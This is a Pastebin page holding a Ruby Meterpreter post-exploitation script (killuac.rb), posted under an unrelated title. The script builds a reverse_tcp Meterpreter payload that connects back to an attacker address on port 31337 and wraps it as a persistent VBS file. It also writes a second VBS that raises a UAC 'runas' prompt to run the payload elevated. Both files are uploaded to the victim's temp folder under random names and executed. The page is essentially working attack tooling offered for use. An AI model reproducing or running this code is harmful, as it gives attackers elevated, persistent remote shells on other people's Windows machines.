daily pastebin goal
20%
SHARE
TWEET

getcountermeasure v2 script

a guest Dec 4th, 2010 918 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # $Id: killuac.rb spudgunman $
  2. #
  3. # Meterpreter script to prompt for permissions to run in elevated mode and then call home
  4. # some code pulled from the persistence.rb script
  5. # Script by Kelly Keeton<kellykeeton [at] hotmail>
  6. # Version: 0.5
  7. #
  8. # Default parameters
  9. #
  10. rhost = "192.168.254.129"
  11. rport = 31337
  12. payload = "windows/meterpreter/reverse_tcp"
  13. ##
  14.  
  15. tempdir = client.fs.file.expand_path("%TEMP%")
  16. payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  17.  
  18. platform = client.platform.scan(/(win32|win64)/)
  19. unsupported if not platform
  20.  
  21. print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
  22. pay = client.framework.payloads.create("#{payload}")
  23. pay.datastore['LHOST'] = rhost
  24. pay.datastore['LPORT'] = rport
  25. raw  = pay.generate
  26.  
  27. payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
  28. print_status("Payload script is #{payloadvbs.length} bytes long")
  29.  
  30. uacvbs = "
  31. If WScript.Arguments.length =0 Then
  32.  Set objShell = CreateObject(\"Shell.Application\")
  33.  objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
  34. Else
  35.  Set objShell = WScript.CreateObject(\"WScript.Shell\")
  36.  Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
  37.  strPath = Wscript.ScriptFullName
  38.  Set objFile = objFSO.GetFile(strPath)
  39.  strFolder = objFSO.GetParentFolderName(objFile)
  40.  tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
  41.  objShell.Run(tmp)
  42. End If"
  43. #
  44. # Upload to the filesystem
  45. #
  46. elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  47. print_status("UAC elevation script written to #{elevationfile}")
  48. fd = client.fs.file.new(elevationfile, "wb")
  49. fd.write(uacvbs)
  50. fd.close
  51.  
  52. print_status("payload script written to #{payloadfile}")
  53. fd = client.fs.file.new(payloadfile, "wb")
  54. fd.write(payloadvbs)
  55. fd.close
  56. #
  57. # Execute the script
  58. #
  59. proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
  60. print_status("Script executed with PID #{proc.pid}")
  61. #EOF
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top